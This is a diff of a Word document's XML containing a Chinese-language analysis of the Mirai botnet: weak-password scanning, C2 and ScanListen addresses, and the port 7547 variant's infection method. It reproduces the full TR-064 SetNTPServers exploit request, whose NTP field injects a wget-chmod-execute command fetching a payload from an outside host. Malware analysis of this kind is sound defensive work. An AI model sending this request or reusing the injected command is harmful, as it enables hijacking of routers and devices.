+        <w:t>通过口令锁定ScanListen的地址</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>另外，泰格实验室通过蜜罐收集到了大量的Mirai扫描所用的弱口令。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>一旦一个设备被入侵</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Mirai将</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>会杀死其他蠕虫和木马程序，关闭远程服务禁止其他设备远程链接</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>在22，23，80</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>端口</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>上进行监听的端口将会被杀死。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>匡恩在报告</w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:id w:val="1600993203"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText>CITATION 匡恩网16 \l 2052</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[13]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>提供了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Scan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Listen的通信地址</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>report</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.changeme.com:48101,C2的通信地址为cnc.changeme.com:23</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc472191673"/>
+      <w:r>
+        <w:t>Mirai</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(7547)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>感染原理</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:ind w:firstLine="480"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2016年11月出现的变种</w:t>
+      </w:r>
+      <w:r>
+        <w:t>针对</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>7547</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/5555</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>端口扫描，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>利用远程命令执行漏洞</w:t>
+      </w:r>
       <w:sdt>
         <w:sdtPr>
           <w:rPr>
@@ -5619,7 +7171,6 @@
           <w:id w:val="-1890103300"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -5664,7 +7215,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -5679,15 +7230,8 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:bCs/>
         </w:rPr>
-        <w:t>。下面仅介绍变种Mirai的原理。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
-        <w:ind w:firstLine="480"/>
-      </w:pPr>
+        <w:t>。</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5751,7 +7295,6 @@
           <w:id w:val="409208838"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -5782,7 +7325,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[11]</w:t>
+            <w:t>[15]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -5984,10 +7527,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>POST /UD/act</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>POST /UD/act?1 HTTP/1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -5995,9 +7544,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>?1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6006,7 +7553,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve"> HTTP/1.1</w:t>
+        <w:t>Host: 127.0.0.1:7547</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6032,7 +7579,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>Host: 127.0.0.1:7547</w:t>
+        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6058,8 +7605,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
+        <w:t>SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6085,10 +7631,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>SOAPAction: urn</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>Content-Type: text/xml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6096,9 +7648,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>:dslforum</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6107,7 +7657,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>-org:service:Time:1#SetNTPServers</w:t>
+        <w:t>Content-Length: 526</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6125,7 +7675,14 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6133,7 +7690,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>Content-Type: text/xml</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6159,7 +7725,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>Content-Length: 526</w:t>
+        <w:t xml:space="preserve">&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6177,6 +7743,16 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt; </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6193,7 +7769,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6202,10 +7777,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>&lt;?xml</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">&lt;SOAP-ENV:Body&gt; &lt;u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6213,7 +7794,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve"> version="1.0"?&gt;</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>&lt;NewNTPServer1&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6239,10 +7829,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>&lt;SOAP-ENV</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6250,9 +7846,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>:Envelope</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6261,7 +7855,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve"> xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" </w:t>
+        <w:t xml:space="preserve">&lt;/NewNTPServer1&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6287,7 +7881,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve">SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt; </w:t>
+        <w:t xml:space="preserve">&lt;NewNTPServer2&gt;&lt;/NewNTPServer2&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6313,10 +7907,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>&lt;SOAP-ENV</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t xml:space="preserve">&lt;NewNTPServer3&gt;&lt;/NewNTPServer3&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6324,9 +7924,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>:Body</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6335,7 +7933,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt; &lt;u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"&gt; </w:t>
+        <w:t xml:space="preserve">&lt;NewNTPServer4&gt;&lt;/NewNTPServer4&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6361,7 +7959,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>&lt;NewNTPServer1&gt;</w:t>
+        <w:t xml:space="preserve">&lt;NewNTPServer5&gt;&lt;/NewNTPServer5&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6379,7 +7977,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6388,10 +7985,16 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>cd</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">&lt;/u:SetNTPServers&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="480"/>
+        <w:textAlignment w:val="baseline"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="C7254E"/>
@@ -6399,9 +8002,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /tmp;wget http://l.ocalhost[.]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -6410,244 +8011,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>host/1;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>chmod 777 1;./1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;/NewNTPServer1&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;NewNTPServer2&gt;&lt;/NewNTPServer2&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
